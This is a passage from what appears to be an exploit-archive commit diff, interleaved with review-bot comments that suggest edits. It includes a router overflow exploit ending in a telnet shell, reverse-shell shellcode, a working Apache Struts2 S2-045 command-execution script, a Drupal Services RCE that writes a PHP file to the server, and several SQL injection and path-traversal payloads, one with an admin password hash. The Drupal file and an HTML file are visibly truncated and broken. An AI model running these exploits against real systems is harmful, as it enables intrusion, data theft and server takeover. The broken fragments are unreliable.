+ data, sender = s.recvfrom(1500)
+
+ if sender[0] == ROUTER_IP and sender[1] == 1008:
+ print("[-] received SSP discovery")
+
+ data = {}
+ data['clean'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + b'CCCC'*11 + b'\xfc\x8c\x40/' +b'\r\n\r\n'
+ data['pwn'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + b"AAAA"*11 + b'\x04\xd5\x41/' +b'\r\n\r\n'
+ data['heap'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + IP.encode()+ b':1337/A\r\n\r\n'
+ data['heap2']= data['heap']
+
+ sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
+ sock.sendto(data[state], sender)
+
+ if state == 'pwn':
+ print("[-] starting payload")
+ while True:
+ try:
+ print("[-] try to connect to shell")
+ telnet = telnetlib.Telnet()
+ telnet.open('192.168.1.1', 0x1337, timeout=1)
+ print('[+] connected')
+ telnet.write(b'uname -a; echo [+] pwned\n')
+ telnet.interact()
+ except:
+ pass
+ time.sleep(2.0)
+
+ if state == 'heap2':
+ print("[-] spraying heap 2/2")
+ mac()
+ state = 'pwn'
+
+ if state == 'heap':
+ print("[-] spraying heap 1/2")
+ mac()
+ state = 'heap2'
+
+ if state == 'clean':
+ print('[-] clearing database and crashing')
+ mac()
+ state = 'heap'
+---EOF---
\ No newline at end of file
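Review bot: The embedded `networkmap-pwn.py` header says `# CVE: TODO` while the advisory's own header above gives `CVE: CVE-2017-6548`; the script header should carry the same identifier so the two halves of the file agree. `INTERACE` is misspelled in its three uses in the script (it is a module constant, so renaming it to `INTERFACE` is safe). The UDP `sock` created inside the receive loop is never closed, so a descriptor leaks on every discovery; wrapping the `sendto` in `with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:` fixes it.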
diff --git a/platforms/linux/shellcode/41398.nasm b/platforms/lin_x86-64/shellcode/41398.nasm
similarity index 63%
rename from platforms/linux/shellcode/41398.nasm
rename to platforms/lin_x86-64/shellcode/41398.nasm
index 5e699caad..97a53a7f5 100755
--- a/platforms/linux/shellcode/41398.nasm
+++ b/platforms/lin_x86-64/shellcode/41398.nasm
@@ -20,29 +20,51 @@
;from, out of or in connection with the software or the use or other
;dealings in the Software.
;
-; For a detailed explanation of this shellcode see my blog post:
-; http://a41l4.blogspot.fr/2017/02/assignment-2b.html
-; 22 bytes, zero nulls
-global _start
+; For a detailed explanation of this shellcode see my blog post:
+; http://a41l4.blogspot.ca/2017/02/assignment-2b.html
+global _start
section .text
-
_start:
- ; zeros RAX, RDX and RSI with only 4 bytes of machine code
- xor esi,esi
- mul esi
-
- ; null terminator for the following string
- push rax
-
- ; push /bin//sh in reverse
- mov rbx,'/bin//sh'
+; Socket
+ push 41
+ pop rax
+ push 2
+ pop rdi
+ push 1
+ pop rsi
+ cdq
+ syscall
+; Connect
+ xchg edi, eax
+ mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002
+ not rbx
push rbx
+ mov al, 42
+ push rsp
+ pop rsi
+ mov dl, 16
+ syscall
+; Dup 2
+ push 3
+ pop rsi
+dup2loop:
+ mov al, 33
+ dec esi
+ syscall
+ loopnz dup2loop
+; Execve
+ ; rax and rsi are zero from the result of the last dup2 syscall and loop
+ push rax ; zero terminator for the following string that we are pushing
- ; store /bin//sh address in RDI, points at string
+ mov rbx, '/bin//sh'
+ push rbx
+
+ ; store /bin//sh address in RDI
push rsp
pop rdi
+
+ cdq ; zero rdx
- ; Call the Execve syscall
mov al, 59
- syscall
\ No newline at end of file
+ syscall
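Review bot: The rewritten header drops the old `; 22 bytes, zero nulls` line without replacing it, so the file no longer states the size or the no-null-byte property that its index entry (65 bytes) advertises; add the equivalent line for the new code. The only constant a reader must decode, `mov rbx, 0xfeffff80a3eefffd`, is described just as `not encoded 0x0100007f5c110002`; say what it builds, e.g. `; sockaddr_in {AF_INET, port 0x115c (4444, network order), 127.0.0.1}, NOT-encoded so no null bytes`. `dup2loop` appears to rely on `loopnz` seeing a non-zero rcx after `syscall` (the kernel leaves the return address there) and on the flags from `dec esi` surviving the syscall; a one-line comment on `loopnz dup2loop` stating that would stop a future editor from "fixing" it into a plain `jnz`.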
diff --git a/platforms/linux/webapps/41570.py b/platforms/linux/webapps/41570.py
new file mode 100755
index 000000000..61b7edfda
--- /dev/null
+++ b/platforms/linux/webapps/41570.py
@@ -0,0 +1,47 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+import urllib2
+import httplib
+
+
+def exploit(url, cmd):
+ payload = "%{(#_='multipart/form-data')."
+ payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
+ payload += "(#_memberAccess?"
+ payload += "(#_memberAccess=#dm):"
+ payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+ payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+ payload += "(#ognlUtil.getExcludedPackageNames().clear())."
+ payload += "(#ognlUtil.getExcludedClasses().clear())."
+ payload += "(#context.setMemberAccess(#dm))))."
+ payload += "(#cmd='%s')." % cmd
+ payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+ payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
+ payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
+ payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
+ payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+ payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+ payload += "(#ros.flush())}"
+
+ try:
+ headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
+ request = urllib2.Request(url, headers=headers)
+ page = urllib2.urlopen(request).read()
+ except httplib.IncompleteRead, e:
+ page = e.partial
+
+ print(page)
+ return page
+
+
+if __name__ == '__main__':
+ import sys
+ if len(sys.argv) != 3:
+ print("[*] struts2_S2-045.py ")
+ else:
+ print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
+ url = sys.argv[1]
+ cmd = sys.argv[2]
+ print("[*] cmd: %s\n" % cmd)
+ exploit(url, cmd)
\ No newline at end of file
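Review bot: The file carries none of the header metadata the other additions in this commit have (compare the `# Exploit Title` / `# CVE` / `# Version` block in 41565.py): the CVE, affected versions and author appear only in a runtime `print` at the bottom, and the usage message `print("[*] struts2_S2-045.py ")` names no arguments. Add a header comment with the CVE (2017-5638), the affected Struts range that files.csv lists for this entry and the author, and make the usage line say what it expects, e.g. `print("[*] usage: struts2_S2-045.py <url> <cmd>")`. `except httplib.IncompleteRead, e:` is Python 2-only syntax while the shebang is the unversioned `/usr/bin/python`; stating the interpreter requirement in the header (or `#!/usr/bin/env python2`) would save the next reader a SyntaxError.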
diff --git a/platforms/php/webapps/41556.txt b/platforms/php/webapps/41556.txt
new file mode 100755
index 000000000..b3e5bd0a5
--- /dev/null
+++ b/platforms/php/webapps/41556.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Country on Sale Script - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: http://www.websitescripts.org/
+# Software: http://www.websitescripts.org/website-scripts/country-on-sale-script/prod_53.html
+# Demo: http://www.websitescripts.org/demo/countryonsalescript/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/read_more.php?newsid=[SQL]
+# http://localhost/[PATH]/countries/index.php?id=[SQL]
+# 13'+/*!50000union*/+select+1,version(),0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,4,5--+-
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41557.txt b/platforms/php/webapps/41557.txt
new file mode 100755
index 000000000..eb8540cab
--- /dev/null
+++ b/platforms/php/webapps/41557.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Media Search Engine Script - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: http://www.websitescripts.org/
+# Software: http://www.websitescripts.org/website-scripts/media-search-engine-script/prod_51.html
+# Demo: http://www.websitescripts.org/demo/mediasearchengine/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?search=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41558.txt b/platforms/php/webapps/41558.txt
new file mode 100755
index 000000000..047156919
--- /dev/null
+++ b/platforms/php/webapps/41558.txt
@@ -0,0 +1,24 @@
+# # # # #
+# Exploit Title: Soundify - Audio Sharing Software v1.1 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.ncrypted.net/
+# Software: https://www.ncrypted.net/soundify
+# Demo: http://demo.ncryptedprojects.com/soundify/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/player?tid=[SQL]
+# tbl_admin :adminId
+# tbl_admin :firstName
+# tbl_admin :userName
+# tbl_admin :adminEmail
+# tbl_admin :passWord
+# tbl_admin :adminType
+# Etc..
+# # # # #
\ No newline at end of file
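Review bot: The header is inconsistent about the affected version: the title line reads `Soundify - Audio Sharing Software v1.1` while the `# Version:` field a few lines below reads `N/A`. The version field is what the index and readers rely on, so it should read `# Version: 1.1`, or the title should drop the version if it was not actually confirmed. The sibling advisories 41559 through 41563 in this commit keep the two fields in agreement.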
diff --git a/platforms/php/webapps/41559.txt b/platforms/php/webapps/41559.txt
new file mode 100755
index 000000000..1a067bbe2
--- /dev/null
+++ b/platforms/php/webapps/41559.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: BistroStays - Vacation Rental Software v3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.ncrypted.net/
+# Software: https://www.ncrypted.net/bistrostays
+# Demo: http://demo.ncryptedprojects.com/bistrostays_v3/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?guests=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41560.txt b/platforms/php/webapps/41560.txt
new file mode 100755
index 000000000..ea7737020
--- /dev/null
+++ b/platforms/php/webapps/41560.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Nlance - Freelance Marketplace Software v2.2 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.ncrypted.net/
+# Software: https://www.ncrypted.net/nlance
+# Demo: http://demo.ncryptedprojects.com/nlance-ent/
+# Version: 2.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search/provider/?skill=[SQL]
+# -38'+/*!50000union*/+select+1,@@version--+-
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41561.txt b/platforms/php/webapps/41561.txt
new file mode 100755
index 000000000..296fa7941
--- /dev/null
+++ b/platforms/php/webapps/41561.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Busewe - Website Marketplace Software v1.2 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.ncrypted.net/
+# Software: https://www.ncrypted.net/busewe
+# Demo: http://demo.ncryptedprojects.com/busewe/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/result?sort=desc&format=private&status=completed&age_min=[SQL]&age_max=[SQL]&revenue_min=[SQL]&revenue_max=[SQL]&profit_min=[SQL]&profit_max=[SQL]
+# admin :id
+# admin :username
+# admin :password
+# admin :masterPassword
+# admin :email
+# admin :role
+# admin :permissions
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/41562.txt b/platforms/php/webapps/41562.txt
new file mode 100755
index 000000000..8fb928d5e
--- /dev/null
+++ b/platforms/php/webapps/41562.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Fashmark - eCommerce Script v1.2 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.ncrypted.net/
+# Software: https://www.ncrypted.net/fashmark
+# Demo: http://demo.ncryptedprojects.com/fashmark-ent/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search/?searchChar=Ihsan_Sencan&category=[SQL]
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/41563.txt b/platforms/php/webapps/41563.txt
new file mode 100755
index 000000000..029d0d033
--- /dev/null
+++ b/platforms/php/webapps/41563.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: TradeMart - B2B Trading Software v1.1 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.ncrypted.net/
+# Software: https://www.ncrypted.net/trademart
+# Demo: http://demo.ncryptedprojects.com/trademart/
+# Version: 1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/Search?by=p&q=&user=[SQL]
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/41564.php b/platforms/php/webapps/41564.php
new file mode 100755
index 000000000..fb2dcfb19
--- /dev/null
+++ b/platforms/php/webapps/41564.php
@@ -0,0 +1,319 @@
+# Exploit Title: Drupal 7.x Services Module Remote Code Execution
+# Vendor Homepage: https://www.drupal.org/project/services
+# Exploit Author: Charles FOL
+# Contact: https://twitter.com/ambionics
+# Website: https://www.ambionics.io/blog/drupal-services-module-rce
+
+
+#!/usr/bin/php
+ 'dixuSOspsOUU.php',
+ 'data' => ''
+];
+
+$browser = new Browser($url . $endpoint_path);
+
+
+# Stage 1: SQL Injection
+
+class DatabaseCondition
+{
+ protected $conditions = [
+ "#conjunction" => "AND"
+ ];
+ protected $arguments = [];
+ protected $changed = false;
+ protected $queryPlaceholderIdentifier = null;
+ public $stringVersion = null;
+
+ public function __construct($stringVersion=null)
+ {
+ $this->stringVersion = $stringVersion;
+
+ if(!isset($stringVersion))
+ {
+ $this->changed = true;
+ $this->stringVersion = null;
+ }
+ }
+}
+
+class SelectQueryExtender {
+ # Contains a DatabaseCondition object instead of a SelectQueryInterface
+ # so that $query->compile() exists and (string) $query is controlled by
+us.
+ protected $query = null;
+
+ protected $uniqueIdentifier = QID;
+ protected $connection;
+ protected $placeholder = 0;
+
+ public function __construct($sql)
+ {
+ $this->query = new DatabaseCondition($sql);
+ }
+}
+
+$cache_id = "services:$endpoint:resources";
+$sql_cache = "SELECT data FROM {cache} WHERE cid='$cache_id'";
+$password_hash = '$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd';
+
+# Take first user but with a custom password
+# Store the original password hash in signature_format, and endpoint cache
+# in signature
+$query =
+ "0x3a) UNION SELECT ux.uid AS uid, " .
+ "ux.name AS name, '$password_hash' AS pass, " .
+ "ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " .
+ "ux.pass AS signature_format, ux.created AS created, " .
+ "ux.access AS access, ux.login AS login, ux.status AS status, " .
+ "ux.timezone AS timezone, ux.language AS language, ux.picture " .
+ "AS picture, ux.init AS init, ux.data AS data FROM {users} ux " .
+ "WHERE ux.uid<>(0"
+;
+
+$query = new SelectQueryExtender($query);
+$data = ['username' => $query, 'password' => 'ouvreboite'];
+$data = serialize($data);
+
+$json = $browser->post(TYPE_PHP, $data);
+
+# If this worked, the rest will as well
+if(!isset($json->user))
+{
+ print_r($json);
+ e("Failed to login with fake password");
+}
+
+# Store session and user data
+
+$session = [
+ 'session_name' => $json->session_name,
+ 'session_id' => $json->sessid,
+ 'token' => $json->token
+];
+store('session', $session);
+
+$user = $json->user;
+
+# Unserialize the cached value
+# Note: Drupal websites admins, this is your opportunity to fight back :)
+$cache = unserialize($user->signature);
+
+# Reassign fields
+$user->pass = $user->signature_format;
+unset($user->signature);
+unset($user->signature_format);
+
+store('user', $user);
+
+if($cache === false)
+{
+ e("Unable to obtains endpoint's cache value");
+}
+
+x("Cache contains " . sizeof($cache) . " entries");
+
+# Stage 2: Change endpoint's behaviour to write a shell
+
+class DrupalCacheArray
+{
+ # Cache ID
+ protected $cid = "services:endpoint_name:resources";
+ # Name of the table to fetch data from.
+ # Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
+ protected $bin = 'cache';
+ protected $keysToPersist = [];
+ protected $storage = [];
+
+ function __construct($storage, $endpoint, $controller, $action) {
+ $settings = [
+ 'services' => ['resource_api_version' => '1.0']
+ ];
+ $this->cid = "services:$endpoint:resources";
+
+ # If no endpoint is given, just reset the original values
+ if(isset($controller))
+ {
+ $storage[$controller]['actions'][$action] = [
+ 'help' => 'Writes data to a file',
+ # Callback function
+ 'callback' => 'file_put_contents',
+ # This one does not accept "true" as Drupal does,
+ # so we just go for a tautology
+ 'access callback' => 'is_string',
+ 'access arguments' => ['a string'],
+ # Arguments given through POST
+ 'args' => [
+ 0 => [
+ 'name' => 'filename',
+ 'type' => 'string',
+ 'description' => 'Path to the file',
+ 'source' => ['data' => 'filename'],
+ 'optional' => false,
+ ],
+ 1 => [
+ 'name' => 'data',
+ 'type' => 'string',
+ 'description' => 'The data to write',
+ 'source' => ['data' => 'data'],
+ 'optional' => false,
+ ],
+ ],
+ 'file' => [
+ 'type' => 'inc',
+ 'module' => 'services',
+ 'name' => 'resources/user_resource',
+ ],
+ 'endpoint' => $settings
+ ];
+ $storage[$controller]['endpoint']['actions'] += [
+ $action => [
+ 'enabled' => 1,
+ 'settings' => $settings
+ ]
+ ];
+ }
+
+ $this->storage = $storage;
+ $this->keysToPersist = array_fill_keys(array_keys($storage), true);
+ }
+}
+
+class ThemeRegistry Extends DrupalCacheArray {
+ protected $persistable;
+ protected $completeRegistry;
+}
+
+cache_poison($endpoint, $cache);
+
+# Write the file
+$json = (array) $browser->post(TYPE_JSON, json_encode($file));
+
+
+# Stage 3: Restore endpoint's behaviour
+
+cache_reset($endpoint, $cache);
+
+if(!(isset($json[0]) && $json[0] === strlen($file['data'])))
+{
+ e("Failed to write file.");
+}
+
+$file_url = $url . '/' . $file['filename'];
+x("File written: $file_url");
+
+
+# HTTP Browser
+
+class Browser
+{
+ private $url;
+ private $controller = CONTROLLER;
+ private $action = ACTION;
+
+ function __construct($url)
+ {
+ $this->url = $url;
+ }
+
+ function post($type, $data)
+ {
+ $headers = [
+ "Accept: " . TYPE_JSON,
+ "Content-Type: $type",
+ "Content-Length: " . strlen($data)
+ ];
+ $url = $this->url . '/' . $this->controller . '/' . $this->action;
+
+ $s = curl_init();
+ curl_setopt($s, CURLOPT_URL, $url);
+ curl_setopt($s, CURLOPT_HTTPHEADER, $headers);
+ curl_setopt($s, CURLOPT_POST, 1);
+ curl_setopt($s, CURLOPT_POSTFIELDS, $data);
+ curl_setopt($s, CURLOPT_RETURNTRANSFER, true);
+ curl_setopt($s, CURLOPT_SSL_VERIFYHOST, 0);
+ curl_setopt($s, CURLOPT_SSL_VERIFYPEER, 0);
+ $output = curl_exec($s);
+ $error = curl_error($s);
+ curl_close($s);
+
+ if($error)
+ {
+ e("cURL: $error");
+ }
+
+ return json_decode($output);
+ }
+}
+
+# Cache
+
+function cache_poison($endpoint, $cache)
+{
+ $tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION);
+ cache_edit($tr);
+}
+
+function cache_reset($endpoint, $cache)
+{
+ $tr = new ThemeRegistry($cache, $endpoint, null, null);
+ cache_edit($tr);
+}
+
+function cache_edit($tr)
+{
+ global $browser;
+ $data = serialize([$tr]);
+ $json = $browser->post(TYPE_PHP, $data);
+}
+
+# Utils
+
+function x($message)
+{
+ print("$message\n");
+}
+
+function e($message)
+{
+ x($message);
+ exit(1);
+}
+
+function store($name, $data)
+{
+ $filename = "$name.json";
+ file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT));
+ x("Stored $name information in $filename");
+}
+
+
+
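Review bot: As archived here the file is not valid PHP: it jumps from the `#!/usr/bin/php` line straight into ` 'dixuSOspsOUU.php',` with no `<?php` open tag, and the definitions of `$url`, `$endpoint_path`, `$endpoint`, `$file` and the constants `QID`, `TYPE_PHP`, `TYPE_JSON`, `CONTROLLER` and `ACTION` that the rest of the script references are absent. The hunk header declares 319 added lines while fewer appear, so this is probably text lost in extraction (everything between `<?php` and the next `>`) rather than the committed file, but the stored copy should be checked against the upstream source before it is relied on. A second breakage is independent of that: the comment in `SelectQueryExtender` wraps onto a line of its own (`us.`) with no leading `#`, which is a parse error wherever it occurs. The same loss appears to affect platforms/xml/webapps/41574.html further down, where a single text line survives of the 115 its hunk header announces.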
diff --git a/platforms/php/webapps/41566.txt b/platforms/php/webapps/41566.txt
new file mode 100755
index 000000000..8486fae68
--- /dev/null
+++ b/platforms/php/webapps/41566.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: WordPress Plugin Mac Photo Gallery v3.0 - Arbitrary File Download
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.apptha.com/
+# Software: https://www.apptha.com/category/extension/Wordpress/Mac-Photo-Gallery
+# Demo: http://www.apptha.com/demo/mac-photo-gallery
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# Exploit :
+# http://localhost/[PLUGIN_PATH]/macdownload.php?albid=../../../wp-load.php
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/41567.txt b/platforms/php/webapps/41567.txt
new file mode 100755
index 000000000..f394add5a
--- /dev/null
+++ b/platforms/php/webapps/41567.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.apptha.com/
+# Software: https://www.apptha.com/category/extension/Wordpress/apptha-slider-gallery
+# Demo: http://www.apptha.com/demo/apptha-slider-gallery
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/?albid=[SQL]
+# For example;
+# -3+/*!50000union*/+select+1,2,3,4,5,0x496873616e2053656e63616e20207777772e696873616e2e6e6574,concat(user_login,0x3a,user_pass),8,9,10,11,12,13,14+from+pleasant_users--+-&pid=6
+# admin:$P$BKL0XND.tfopqZH6S.QU.vhgjuVchx1
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41568.txt b/platforms/php/webapps/41568.txt
new file mode 100755
index 000000000..f3e99a258
--- /dev/null
+++ b/platforms/php/webapps/41568.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - Arbitrary File Download
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.apptha.com/
+# Software: https://www.apptha.com/category/extension/Wordpress/apptha-slider-gallery
+# Demo: http://www.apptha.com/demo/apptha-slider-gallery
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PLUGIN_PATH]/asgallDownload.php?imgname=../../../wp-load.php
+# Etc..
+# # # # #
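Review bot: The section heading `# SQL Injection/Exploit :` does not match the file: the title and the example describe an arbitrary file download via a `../../../` path in the `imgname` parameter, not SQL injection, and the heading looks copied from the slider-gallery SQL advisory (41567) above. Change it to `# Exploit :`, as the companion file-download advisory 41566.txt does, so the index and anyone triaging the finding are not misled about the vulnerability class.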
diff --git a/platforms/php/webapps/41569.txt b/platforms/php/webapps/41569.txt
new file mode 100755
index 000000000..81b07daac
--- /dev/null
+++ b/platforms/php/webapps/41569.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.apptha.com/
+# Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery
+# Demo: http://www.apptha.com/demo/pica-photo-gallery
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/?aid=[SQL]
+# For example;
+# -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+-
+# wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users
+# Etc..
+# # # # #
diff --git a/platforms/xml/webapps/41574.html b/platforms/xml/webapps/41574.html
new file mode 100755
index 000000000..18877dcda
--- /dev/null
+++ b/platforms/xml/webapps/41574.html
@@ -0,0 +1,115 @@
+
+
+
+
+
+
+2) Persistent Denial Of Service uses call to WMIC
+
+
+
+
+
\ No newline at end of file